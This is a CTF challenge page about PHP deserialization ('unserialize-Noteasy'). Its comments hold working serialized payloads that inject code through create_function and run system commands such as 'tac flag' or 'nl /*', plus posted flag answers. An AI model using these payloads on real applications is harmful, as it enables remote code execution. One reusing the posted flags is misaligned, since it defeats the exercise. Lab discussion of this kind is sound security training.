unserialize-NoteasyWEB 未解决

分数: 30 金币: 3
题目作者: 云牧青
一  血: Lazzaro
一血奖励: 5金币
解  决: 548
提  示:
描  述:
不简单的反序列化
...
登录回复
评论
gxrtbtc 4月前
举报

序列化字符串中%3B%7D%3B部分导致结构断裂(未闭合的花括号和分号)1013 私有属性命名未正确处理空字符\0(应为\0类名\0属性名格式)13 功能失效 create_function构造的函数体;}highlight_file("/flag");/*存在语法错误: ;}会提前结束函数定义 /*未正确注释后续代码21

回复 0
locust 10月前
举报

O%3A7%3A%22Noteasy%22%3A2%3A%7Bs%3A10%3A%22%00Noteasy%00a%22%3Bs%3A15%3A%22create_function%22%3Bs%3A10%3A%22%00Noteasy%00b%22%3Bs%3A29%3A%22%3B%7D%3Bhighlight_file%28%22%2Fflag%22%29%3B%2F%2A%22%3B%7D

回复 0
Jiafeng 11月前
举报

flag{d45ca0bf896cdf6a9903d5030554214e} ; 这里主要是考察反序列化的使用,这里给出一个连接,学会使用create_function函数来进行反序列化的操作; https://blog.csdn.net/weixin_61785633/article/details/131159553

回复 0
雾島风起時 12月前
举报

真心不会等在提升一段时间再来做

回复 0
小猫猫嗷嗷叫 1年前
举报

p=O:7:"Noteasy":2:{s:10:"%00Noteasy%00a";s:15:"create_function";s:10:"%00Noteasy%00b";s:24:";}system("tac%20flag");/*;";}

回复 0
xiaoxiao972521 1年前
举报

一看评论都寄了,我就不开场景了,啊哈哈哈哈

回复 0
XRain 2年前
举报

这种题不会真没办法,相当于当场挖出 create_function 的漏洞,挺难的,只能靠平时看文章和关注安全动态,记下各种技巧。

回复 0
Youmos 2年前
举报

寄了,不会

回复 0
wxy1343 2年前
举报

flag{7d36033f5ec4610a467c527e68c56a9a}

回复 0
bigbox1 2年前
举报

O:7:"Noteasy":2:{s:10:"%00Noteasy%00a";s:15:"create_function";s:10:"%00Noteasy%00b";s:36:";};system("nl *");system("nl /*");//";}

回复 1

WriteUp

image
云牧青

5 金币

立即查看

评分(2)

解题动态

365days 攻破了该题 1天前
wyyyy 攻破了该题 4天前
爱睡觉的鱼 攻破了该题 4天前
Subufan 攻破了该题 5天前
soha 攻破了该题 9天前
kukuqi666 攻破了该题 21天前
xjuqwd 攻破了该题 22天前
xjuqq 攻破了该题 23天前
flag与她皆失 攻破了该题 23天前
2192555073 攻破了该题 23天前
wang12345 攻破了该题 23天前
hupeng888 攻破了该题 1月前
秋天在哪 攻破了该题 1月前
TTxyz 攻破了该题 1月前
jack77213 攻破了该题 1月前
Future92 攻破了该题 1月前
凑友希那 攻破了该题 1月前
unigui 攻破了该题 1月前
15511011321 攻破了该题 1月前
zcgzcx1234 攻破了该题 1月前
问题反馈